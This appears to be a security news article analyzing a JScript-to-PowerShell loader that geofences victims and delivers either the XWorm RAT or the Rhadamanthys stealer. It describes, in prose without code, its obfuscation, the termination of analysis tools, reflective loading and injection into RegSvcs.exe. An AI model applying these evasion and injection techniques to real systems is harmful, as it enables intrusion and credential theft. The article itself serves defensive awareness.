Unmasking Xworm Payload Execution Path through Jailbreaking a Malicious JScript Loader

Security researchers are analyzing a sophisticated malware delivery mechanism that uses a JScript loader to deploy different payloads based on the victim’s geographic location.

This loader initiates a complex chain involving obfuscated PowerShell scripts, ultimately executing potent malware like the XWorm Remote Access Trojan (RAT) or the Rhadamanthys information stealer.

The attack often begins via a scheduled task or through ClickFix attacks involving fake CAPTCHAs, which execute an mshta.exe command to trigger the loader.

– Advertisement –

JScript to PowerShell Loader

The core of the initial stage involves a JScript file designed to construct and execute a PowerShell command.

To evade detection, the PowerShell code is not stored directly but is split into segments within an array, often in a randomized order.

When the JScript runs, it dynamically reassembles these segments into the correct sequence, forming the PowerShell command.

This command is responsible for downloading and executing the next stage of the attack, followed by cleaning up its tracks.

A key feature of this loader is its use of geofencing. Before proceeding, the loader checks the victim’s geographical location by sending an API request to a geolocation service.

It parses the response to determine the country associated with the IP address. If the country is identified as the “United States”, the loader delivers the XWorm RAT.

For victims located outside the U.S., it deploys the Rhadamanthys stealer instead.

This geofencing tactic allows attackers to target specific regions, potentially maximizing impact while minimizing unwanted exposure or analysis from researchers in non-targeted areas.

Multi-Stage PowerShell Execution

Focusing on the path for U.S.-based victims (leading to XWorm), the delivered PowerShell script employs multiple layers of obfuscation and anti-analysis techniques.

Initial Steps and Cleanup

The script begins by decoding strings represented in decimal format. It then forces the script execution policy for the current process to “Unrestricted”, allowing subsequent commands to run without hindrance.

The script actively attempts to terminate running processes that might interfere or belong to analysis tools, including mshta.exe, wscript.exe, msbuild.exe, and any process matching the pattern *.bat.exe.

It also performs file system cleanup, removing various script and shortcut files (.bat, .ps1, .lnk, .cmd, .vbs) from sensitive directories like APPDATA, PUBLIC, Startup, and ProgramData.

Deobfuscation and Payload Handling

A temporary directory is created. A small deobfuscation script, stored in a variable, is written to a file within this new directory. Curiously, the loader executes the variable containing the script rather than the file itself.

This executed variable then processes another variable containing the next stage script, converting it from decimal representation to executable text using a function.

Another variable holds the final malware payload (XWorm), but it remains untouched until the very last script in the chain. After the deobfuscation, the temporary file and directory are deleted.

Final Payload Injection

The script obtained from deobfuscation orchestrates the final steps. It reverses the contents of two key variables: one for the XWorm payload and one for a malicious loader.

Both variables contain data stored in reverse order as decimal values. A function converts these reversed decimal strings into executable byte arrays.

The resulting malicious loader is then reflectively loaded into memory using PowerShell’s reflection capabilities. This allows the script to access the loader’s functions without writing it to disk.

The script dynamically retrieves specific methods from the loaded loader. It defines the paths to legitimate .NET utilities, specifically RegSvcs.exe (found in different framework versions).

Finally, it invokes the retrieved method, passing the RegSvcs.exe path and the final XWorm payload.

This action injects the XWorm malware into the memory space of the legitimate RegSvcs.exe process, a technique similar to process hollowing, allowing the malware to run under the guise of a trusted Microsoft executable. The script concludes with further cleanup actions.

Malware Payloads

XWorm (USA Target)

Delivered to U.S. victims, XWorm is a .NET-based RAT active since mid-2022. It possesses a wide array of capabilities, including DDoS attacks, ransomware functions, clipboard manipulation (specifically targeting cryptocurrency addresses), keylogging, and spreading via USB drives.

It employs anti-analysis techniques like checking for debuggers, virtual machines, and specific analysis environments, often using mutexes to prevent multiple instances.

XWorm establishes persistence, communicates with command-and-control (C2) servers, often using AES encryption, and can download additional plugins or modules.

Rhadamanthys (Non-USA Target)

Victims outside the U.S. receive Rhadamanthys, a C++ information stealer first seen around August 2022.

Sold via subscription, it targets credentials from browsers, VPNs, email clients, chat applications, and cryptocurrency wallets.

Rhadamanthys uses sophisticated obfuscation, including code virtualization and a custom embedded file system.

A notable recent addition is an AI-powered OCR feature to extract cryptocurrency seed phrases directly from images stored on the victim’s machine. It often uses multi-stage loaders and employs anti-analysis checks.

Despite being banned on some forums for targeting Russia, it remains actively developed and distributed, often via malvertising or phishing emails containing malicious attachments.

This attack chain demonstrates a high degree of sophistication, combining JScript, PowerShell, multi-layered obfuscation, geofencing, and fileless execution techniques to deliver tailored malware payloads while evading detection.

Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!